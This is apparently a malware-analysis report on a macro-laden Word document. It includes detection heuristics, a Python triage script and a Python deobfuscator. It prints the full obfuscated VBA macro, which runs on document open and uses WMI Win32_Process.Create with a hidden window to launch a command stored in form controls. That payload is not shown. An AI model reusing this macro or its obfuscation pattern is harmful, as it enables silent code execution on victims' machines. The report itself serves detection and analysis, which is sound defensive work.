Verdict: MALICIOUS
Risk score: 172
Heuristics: 7
- ClamAV: Doc.Malware.Generic-7546200-0 (critical, CLAMAV_DETECTION). ClamAV detected this file as malware: Doc.Malware.Generic-7546200-0.
- VBA macros detected (medium, OLE_VBA_MACROS, 3 related findings). Document contains VBA macro code.
- GetObject call (high, OLE_VBA_GETOBJ). Matched line in script: Set Dpctrvquowo = GetObject(Otacntpvnn)
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC). Triggers on the combination of two tokens co-occurring in the same compiled VBA/cache stream: an auto-execution entry point (Auto_Open / AutoOpen / Document_Open / Workbook_Open / Auto_Close / AutoClose) and a shell/download/object-execution token (Shell, CreateObject, GetObject, PowerShell, cmd.exe, URLDownloadToFile, WinHttp, XMLHTTP, ADODB.Stream, ShellExecute, ExecuteExcel4Macro). Neither token alone fires it; the pairing is what flags p-code-only or source-extraction-failure macro documents where the visible VBA source is unavailable. The matched tokens are named in the detail line below.
- Document_Open macro (low, OLE_VBA_DOCOPEN). Matched line in script: Private Sub Document_open()
- Suspicious extracted artifact (info, EXTRACTED_FILE_STATIC_TRIAGE). One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
- Embedded URL (info, EMBEDDED_URL). One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main, in document text (OLE body). This is the standard Office Open XML DrawingML namespace and is expected in any modern Office document.
Extracted artifacts (1)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8277 bytes |

SHA-256 (macros.bas): 8d1972f99526095b3a55bd672660629ff7455da915bcd736e510b77e56712c1c

Detection (macros.bas):
- ClamAV: No threats found. (The Doc.Malware.Generic-7546200-0 hit above is on the parent document, not on the extracted macro source alone.)
- Obfuscation or payload: likely. 190 of 304 identifiers look randomly generated (e.g. 'Wpqzhgpqtcwne'); 1 string-concatenation chain(s), consistent with name-mangling obfuscation.
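Two of the checks above, the OLE_VBA_PCODE_AUTOEXEC_EXEC pairing rule and the random-identifier ratio behind "190 of 304 identifiers look randomly generated", are simple enough to reimplement. The following is an added example, not the analyzer's own code: the token lists are the ones quoted in the finding, while the identifier test (long consonant runs or very few vowels) is one reasonable approximation and is not claimed to reproduce the analyzer's exact count. It runs over decoded VBA source or over strings carved from a compiled VBA stream; the stream parsing itself is not shown. The sample macro at the bottom is constructed and modelled on the preview below.

```python
"""Static triage of extracted VBA source (added example, not the analyzer's code)."""
import re

# Token lists as quoted in the OLE_VBA_PCODE_AUTOEXEC_EXEC finding.
AUTOEXEC_TOKENS = ["Auto_Open", "AutoOpen", "Document_Open", "Workbook_Open",
                   "Auto_Close", "AutoClose"]
EXEC_TOKENS = ["Shell", "CreateObject", "GetObject", "PowerShell", "cmd.exe",
               "URLDownloadToFile", "WinHttp", "XMLHTTP", "ADODB.Stream",
               "ShellExecute", "ExecuteExcel4Macro"]

# VBA keywords and the built-ins seen in the preview, excluded so only
# author-chosen names are scored.
VBA_KEYWORDS = {
    "attribute", "private", "public", "sub", "function", "end", "select", "case",
    "set", "do", "while", "loop", "if", "then", "else", "dim", "as", "new",
    "true", "false", "and", "or", "not", "call", "exit", "with", "for", "next",
    "to", "each", "split", "join", "ltrim", "chrw", "atn", "sin", "cos", "log",
    "csng", "getobject", "createobject",
}
VOWELS = set("aeiou")
IDENT_RE = re.compile(r"\b[A-Za-z_][A-Za-z0-9_]*\b")
STRING_RE = re.compile(r'"[^"\n]*"')


def _find_tokens(text, tokens):
    """Case-insensitive whole-token search; returns hits in list order."""
    found = []
    for tok in tokens:
        pat = r"(?<![A-Za-z0-9_])" + re.escape(tok) + r"(?![A-Za-z0-9_])"
        if re.search(pat, text, re.IGNORECASE):
            found.append(tok)
    return found


def pcode_autoexec_exec(text):
    """Return (fires, autoexec_hits, exec_hits). Only the pairing fires the rule."""
    autoexec = _find_tokens(text, AUTOEXEC_TOKENS)
    execs = _find_tokens(text, EXEC_TOKENS)
    return bool(autoexec) and bool(execs), autoexec, execs


def looks_random(ident):
    """Heuristic (assumption, not the analyzer's exact test): 8+ letters with a
    run of 4+ consonants or under 20% vowels; 'y' counts as a consonant."""
    letters = "".join(c for c in ident if c.isalpha()).lower()
    if len(letters) < 8:
        return False
    vowel_frac = sum(c in VOWELS for c in letters) / len(letters)
    longest = run = 0
    for c in letters:
        run = 0 if c in VOWELS else run + 1
        longest = max(longest, run)
    return longest >= 4 or vowel_frac < 0.2


def identifier_stats(text):
    """Return (random_count, total_count, sorted random identifiers) over the
    distinct non-keyword identifiers, with string literals blanked first so
    delimiter junk inside strings is not counted."""
    code = STRING_RE.sub('""', text)
    idents = {m.group(0) for m in IDENT_RE.finditer(code)
              if m.group(0).lower() not in VBA_KEYWORDS}
    random_ids = sorted(i for i in idents if looks_random(i))
    return len(random_ids), len(idents), random_ids


# Constructed sample modelled on the preview (not the full macro).
SAMPLE_MACRO = '''Private Sub Document_open()
Kkapcimmcib
End Sub
Function Kkapcimmcib()
Otacntpvnn = Join(Split("//====x//=w//====x//=in" + d, "//====x//="), "")
Set Dpctrvquowo = GetObject(Otacntpvnn)
End Function
'''

if __name__ == "__main__":
    fires, auto, execs = pcode_autoexec_exec(SAMPLE_MACRO)
    print("OLE_VBA_PCODE_AUTOEXEC_EXEC:", fires, auto, execs)
    n_random, n_total, examples = identifier_stats(SAMPLE_MACRO)
    print(f"{n_random} of {n_total} identifiers look randomly generated, e.g. {examples[:3]}")
```

On the constructed sample the pairing rule fires on Document_Open plus GetObject, and neither a bare Document_Open handler nor a lone GetObject call fires it, which is the property the finding describes. Expect the identifier ratio to disagree with the analyzer's 190/304 on the real macros.bas: names like Kkapcimmcib pass a consonant-run test, so a production scorer would add a bigram or dictionary model.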
Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "Efferdrq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Private Sub Document_open()
Kkapcimmcib
End Sub
Attribute VB_Name = "Liyhzkoypfma"
Attribute VB_Base = "0{9EAF311C-2718-452D-A0C8-FA5FE42E91CD}{A1B926CD-2F01-4610-AAFB-2667E6E9D565}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Mojacpyniebzf"
Function Uizzoslddbphd()
Select Case Utpetecknx
Case Dqoulumteo
Hnldhwcv = 7
Earvwczdeeqc = Atn(4)
Gpnnwrhghlwfs = Sin(Rvevmloc)
Case Kubkhmfplwrjo
Kxsgyrjaznjmg = Log(3)
Snxpmxfwayr = 6
Cmhgfxbnv = CSng(Gatbwxzydxed)
Case Maebshhbcynfc
Kzwrfilddz = ChrW(Tljxiuisxwmdo)
Yvorvrpty = 1
Gqawbbpjop = Cos(Ekuplnmt)
End Select
Xkitwdsxnv = ChrW(wdKeyP)
Select Case Jckyesnkijkyg
Case Qbyjlijtt
Zhiawowjdcsh = 7
Ypteshxldc = Atn(4)
Cgpajqbk = Sin(Bhnwcxxey)
Case Amtppapwnegwt
Tdtbfopsnlq = Log(3)
Aozdkebtw = 6
Qlofbvltjmdt = CSng(Nklufeyekwzec)
Case Lwxtzkuakqs
Mswuofwtqzqgv = ChrW(Sfwszeyq)
Lmtkadne = 1
Szfqwpvuwgmd = Cos(Hftzasncqudt)
End Select
Xrpnoikzydum = Xkitwdsxnv + Liyhzkoypfma.Ascdvumitfenw + Liyhzkoypfma.Eoztejoiiemfn
Select Case Roqxknavfs
Case Zlhkqolyoqfq
Smkrudxukr = 7
Elkunrkcslp = Atn(4)
Irzvaiad = Sin(Okoyaueapgbj)
Case Ucofqthxwpl
Zjiekgqvjzski = Log(3)
Zhzzqkayuu = 6
Nqnymnwfq = CSng(Rckskcvv)
Case Wxpqmwnyl
Xcdewbfwmh = ChrW(Eixgrqvzyeyr)
Iarihfsttzgno = 1
Zwybdlhppvi = Cos(Ktellxtfeda)
End Select
losd = Liyhzkoypfma.Ofrxmena.GroupName
Tfnnlhmaf = Split(Xrpnoikzydum + LTrim(losd), "//====dsfnnJJJsm388//=")
Select Case Wpqzhgpqtcwne
Case Pmqwkehw
Hwjaqujgxgzl = 7
Ewjkmfpireez = Atn(4)
Ivotofajfqdhn = Sin(Qedhwroux)
Case Eyffvqpnycrfx
Vqthfribazas = Log(3)
Ubrjqbbd = 6
Mraieyzghdwx = CSng(Egvxffvxhid)
Case Whysrpzvnqaxc
Lfhwacfjgeyu = ChrW(Krecydzjkfi)
Rpuzcebmcbha = 1
Xrotuzgdywu = Cos(Ubucozhoulevq)
End Select
Uizzoslddbphd = Tnakagfgnfgdi + Join(Tfnnlhmaf, "") + Tnakagfgnfgdi
Select Case Irdwcaskbv
Case Vqvrrbtykbs
Itolzndppj = 7
Nhyscmmruwtev = Atn(4)
Uczgzgmtheyc = Sin(Zfhiueuuf)
Case Gfpmzkqutim
Mqanrodk = Log(3)
Uqmvaazaxr = 6
Bwhhuihpwnpe = CSng(Dgdreectu)
Case Ppttipyktpe
Uucophahyw = ChrW(Xgnnqhcmteto)
Yrucpzztwjb = 1
Nugqswbl = Cos(Xdhbuppbos)
End Select
End Function
Function Kkapcimmcib()
d = "//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Liyhzkoypfma.Bnsaodxiii + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"
Select Case Upumvpzkxekc
Case Irybjkbwl
Gxnovzcxggkb = 7
Ecgavqkz = Atn(4)
Ghbbutyeyr = Sin(Mvbeieuzxqmy)
Case Uvqfkgbbi
Acnhgcunmpkzq = Log(3)
Ewopucvmy = 6
Shjqlnmfhbh = CSng(Nsktskwzwdb)
Case Stvfqoeskm
Ewmkbexdxbcrc = ChrW(Govdhlyutkb)
Nxdfgxnnkouz = 1
Orrddvax = Cos(Jwkfctazsep)
End Select
E = "//====dsfnnJJJsm388//="
Select Case Uopbqqll
Case Tteplijtsfojw
Ircanjhaz = 7
Qikkhncfsm = Atn(4)
Mmbnvvnlsxt = Sin(Ilzpmteyarajh)
Case Gqzvqeqn
Lemfstpclycdp = Log(3)
Nomubenxnebx = 6
Usxotaosshyl = CSng(Zydbsddpdskry)
Case Arvskqgeowgdu
Wqwryobaf = ChrW(Foedbchtrqc)
Gstofmzitzwuv = 1
Kzqqywlsz = Cos(Ewaeouxzlgvn)
End Select
Muqlomgandy = Split("//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T, E)
Select Case Qewrvwfwn
Case Nmsezjockz
Kwkoviyi = 7
Khriprotbh = Atn(4)
Zfsqytntnhuz = Sin(Khjnotxbbkmq)
Case Orxoxrxfwfkfu
Dnrxuhgjnsnvx = Log(3)
Dhzqfwjfc = 6
Eledjyddxwvtz = CSng(Ikwkwzboc)
Case Eocuipdwd
Kiosuglin = ChrW(Xnzirxyc)
Zeupbdof = 1
Mmdznvee = Cos(Tpfdqovz)
End Select
Otacntpvnn = Join(Muqlomgandy, "")
Select Case Atimkevdrjh
Case Xxeazver
Vmsiwtisc = 7
Dkygwqsnlnb = Atn(4)
Wtemnvmzm = Sin(Aswzjirefq)
Case Gtcfmddvuql
Pwehwoqz = Log(3)
Ettecvxpr = 6
Xskqawjpr = CSng(Kwtmmxibd)
Case Oxlsyazxbtjw
Uqwrhjuv = ChrW(Wlpjahpyrd)
Ehyiquimbzb = 1
Gmkwfaszcwnl = Cos(Telfozglotytz)
End Select
Set Dpctrvquowo = GetObject(Otacntpvnn)
Select Case Thwrzhlcvi
Case Dbkeskhubqci
Itlcubmod = 7
Ibznfrxke = Atn(4)
Ybhrnyidenx = Sin(Srsogioydxjii)
Case Zfypotujucnof
Tliaunyj = Log(3)
Dqveyifrmdzph = 6
Xhxlsuixb = CSng(Ahmjawttldzew)
Case Xtwceddvx
Xmbusubz = ChrW(Edddvotbydbrk)
Byzuxmodzyh = 1
Ledwmksqtyi = Cos(Uzcagbegqv)
End Select
Jzklgxlwwks = Liyhzkoypfma.Byefsmbyxsqlk.Tag
Qnsnlcdzxlg = Otacntpvnn + ChrW(wdKeyS) + Liyhzkoypfma.Kjhbiofihigx.Tag + Jzklgxlwwks
Select Case Prfecrlhmk
Case Vdjzzwbqqp
Hpbbvetrixj = 7
Yzphykcucouuq = Atn(4)
Avwaepwmqjli = Sin(Bxuodbxljrfl)
Case Bghfzbrna
Gbmzxmblybq = Log(3)
Nduplevtu = 6
Jcgioenxly = CSng(Kmlfdzwd)
Case Brwhbbwnw
Bpvgswunto = ChrW(Ckcazstxpad)
Mhcmbyblrix = 1
Kdcprrtctxzbw = Cos(Otalurgo)
End Select
Ilngufnacbk = Qnsnlcdzxlg + Liyhzkoypfma.Bnsaodxiii
Select Case Mddrljdpjvy
Case Hovczfcijhk
Updpfxfvuej = 7
Cposqlaul = Atn(4)
Mjmfhcwtlwp = Sin(Upaftmklar)
Case Urryfviood
Zoriqqlncb = Log(3)
Luazqels = 6
Mlevfahzyqup = CSng(Vbujfpktt)
Case Lujykrdcgbg
Llgddhgvovdp = ChrW(Mtitrohu)
Aozqmaeoxzyuj = 1
Mjrwzfiapri = Cos(Opnrficpi)
End Select
Set Kkapcimmcib = GetObject(Ilngufnacbk)
Select Case Ynnpmvzfedxo
Case Rqxrbcgzp
Njebpzgd = 7
Limvzdwgeq = Atn(4)
Tfgcndpk = Sin(Inymudoerldwf)
Case Vczkslotlp
Nldnnmmzzwni = Log(3)
Azxxxzxrsbqa = 6
Utnwwiasnxq = CSng(Ilyorralovns)
Case Vtcxngzffjqll
Mahnhoftm = ChrW(Fbfxzexkfy)
Cdtdgpxfgjdcv = 1
Ripapyeay = Cos(Kmnaljaae)
End Select
Kkapcimmcib. _
showwindow = False
Select Case Mkpqxwddeuvx
Case Fvxjheiix
Lesrzwdmw = 7
Oiezsuublwot = Atn(4)
Cyqpndnnll = Sin(Leyrkclngp)
Case Mnowqjxkn
Xnxjqebxtihjp = Log(3)
Llhrentidzpr = 6
Ngxeiaen = CSng(Ifsmzfeytwxl)
Case Cieeukbndvfbk
Coytmjzuh = ChrW(Vrxbdcdbbzwzt)
Vbxhyuzrqhzs = 1
Doxwwpkpcr = Cos(Jchgoelsnxxak)
End Select
Do While Dpctrvquowo. _
Create(pok & Uizzoslddbphd, Olxakeefrmijs, Kkapcimmcib, Bzgggmozdtb)
Loop
Select Case Qsmrrsndhnoor
Case Bcbvtmheotemb
Dsjjhzjsagds = 7
Pcyjwapddgljn = Atn(4)
Mflzokvehayrk = Sin(Qunizrgcfdd)
Case Dyylmuoarsf
Xrjxjfcoprvf = Log(3)
Gcgvkkgbi = 6
Fpmoybiwgt = CSng(Iuyxangdgooi)
Case Xubnwihkeq
Rqmirmrj = ChrW(Mmgnczgq)
Qndovtxgl = 1
Ihavqqxxbqo = Cos(Iohigidopljen)
End Select
End Function
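The macro above hides its strings behind one trick: every literal is padded with the separator "//====dsfnnJJJsm388//=" and later passed through Split(..., delimiter) and Join(..., ""), which just deletes the separator, with single characters supplied by ChrW(wdKeyS) / ChrW(wdKeyP) and the rest read from controls on the UserForm Liyhzkoypfma. The block below is an added example, not part of the report, that emulates only those three primitives ("+" concatenation, ChrW(wdKeyX), Split/Join) over the expressions copied verbatim from the preview. Word's WdKey constants for letters equal their ASCII codes (wdKeyA = 65 ... wdKeyZ = 90), so ChrW(wdKeyS) is "S" and ChrW(wdKeyP) is "P". The form control contents, .Tag and .GroupName values are not in the preview, so every such reference is kept as a <name> placeholder rather than guessed; the variables T, Tnakagfgnfgdi and pok are never assigned in the macro and are treated as Empty, which concatenates as "".

```python
"""Recover the strings the macro builds before GetObject() and Create().
Added example; emulates only "+", ChrW(wdKeyX) and Split/Join."""
import re

DELIM = "//====dsfnnJJJsm388//="   # separator passed to every Split() in the macro


def wdkey(name):
    """WdKey letter constants equal their ASCII codes (wdKeyA = 65 ... wdKeyZ = 90)."""
    m = re.fullmatch(r"wdKey([A-Z])", name)
    return ord(m.group(1)) if m else None


TOKEN_RE = re.compile(r'''
    "(?P<lit>[^"]*)"                # string literal
  | ChrW\((?P<chrw>\w+)\)           # ChrW(wdKeyX)
  | (?P<ref>[A-Za-z_][\w.]*)        # variable or Form.Control.Property reference
  | (?P<op>\+|&)                    # concatenation operator
''', re.VERBOSE)


def eval_concat(expr, env):
    """Evaluate a VBA concatenation expression. Names in env are substituted;
    anything unknown (form controls, tags) becomes a <name> placeholder."""
    out = []
    for m in TOKEN_RE.finditer(expr):
        if m.group("lit") is not None:
            out.append(m.group("lit"))
        elif m.group("chrw"):
            code = wdkey(m.group("chrw"))
            out.append(chr(code) if code is not None else f"<ChrW({m.group('chrw')})>")
        elif m.group("ref"):
            out.append(env.get(m.group("ref"), f"<{m.group('ref')}>"))
    return "".join(out)


def split_join(s, delim=DELIM):
    """Split(s, delim) followed by Join(parts, "") simply deletes every delimiter."""
    return "".join(s.split(delim))


# (target, expression, apply Split/Join) copied from the preview in evaluation
# order. The Select Case blocks between them only assign unused variables and
# never touch these strings, so they are skipped.
STEPS = [
    # Uizzoslddbphd(): builds the first argument of Create()
    ("Xkitwdsxnv", "ChrW(wdKeyP)", False),
    ("Xrpnoikzydum", "Xkitwdsxnv + Liyhzkoypfma.Ascdvumitfenw + Liyhzkoypfma.Eoztejoiiemfn", False),
    ("losd", "Liyhzkoypfma.Ofrxmena.GroupName", False),
    ("Tfnnlhmaf", "Xrpnoikzydum + losd", True),   # LTrim(losd) is a no-op on a placeholder
    ("Uizzoslddbphd", "Tnakagfgnfgdi + Tfnnlhmaf + Tnakagfgnfgdi", False),
    # Kkapcimmcib(): builds the two GetObject() monikers
    ("d", '"//====dsfnnJJJsm388//=i//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=n//====dsfnnJJJsm388//=m//====dsfnnJJJsm388//=gmt//====dsfnnJJJsm388//=" + ChrW(wdKeyS) + "//====dsfnnJJJsm388//=:w//====dsfnnJJJsm388//=in//====dsfnnJJJsm388//=32//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=_//====dsfnnJJJsm388//=" + Liyhzkoypfma.Bnsaodxiii + "//====dsfnnJJJsm388//=ro//====dsfnnJJJsm388//=ce//====dsfnnJJJsm388//=ss"', False),
    ("Otacntpvnn", '"//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=w//====dsfnnJJJsm388//=//====dsfnnJJJsm388//=" + d + T', True),
    ("Jzklgxlwwks", "Liyhzkoypfma.Byefsmbyxsqlk.Tag", False),
    ("Qnsnlcdzxlg", "Otacntpvnn + ChrW(wdKeyS) + Liyhzkoypfma.Kjhbiofihigx.Tag + Jzklgxlwwks", False),
    ("Ilngufnacbk", "Qnsnlcdzxlg + Liyhzkoypfma.Bnsaodxiii", False),
]


def recover():
    """Run all steps; returns target name -> recovered string (with placeholders)."""
    # T, Tnakagfgnfgdi and pok are never assigned in the macro: an unassigned
    # Variant is Empty, which concatenates as the empty string.
    env = {"T": "", "Tnakagfgnfgdi": "", "pok": ""}
    for name, expr, strip in STEPS:
        value = eval_concat(expr, env)
        env[name] = split_join(value) if strip else value
    return env


if __name__ == "__main__":
    r = recover()
    for name in ("Otacntpvnn", "Ilngufnacbk", "Uizzoslddbphd"):
        print(f"{name} = {r[name]}")
```

Reading the output is an inference from the visible fragments, not something the page states: the first GetObject() argument recovers as "winmgmtS:win32_<Liyhzkoypfma.Bnsaodxiii>rocess", which with a one-character control value is consistent with the WMI moniker winmgmts:Win32_Process (monikers are case-insensitive); the second is the same string plus "S", two .Tag values and the same control, consistent with Win32_ProcessStartup, on which the macro sets showwindow = False before looping on Dpctrvquowo.Create(pok & Uizzoslddbphd, ...) until it returns 0, the success value of Win32_Process.Create(CommandLine, CurrentDirectory, ProcessStartupInformation, ProcessId). The command line itself comes entirely from the form controls, which this preview does not include, so the actual payload cannot be recovered from the page; an analyst would pull the UserForm stream (olevba's form-data extraction or a similar tool) to fill the placeholders.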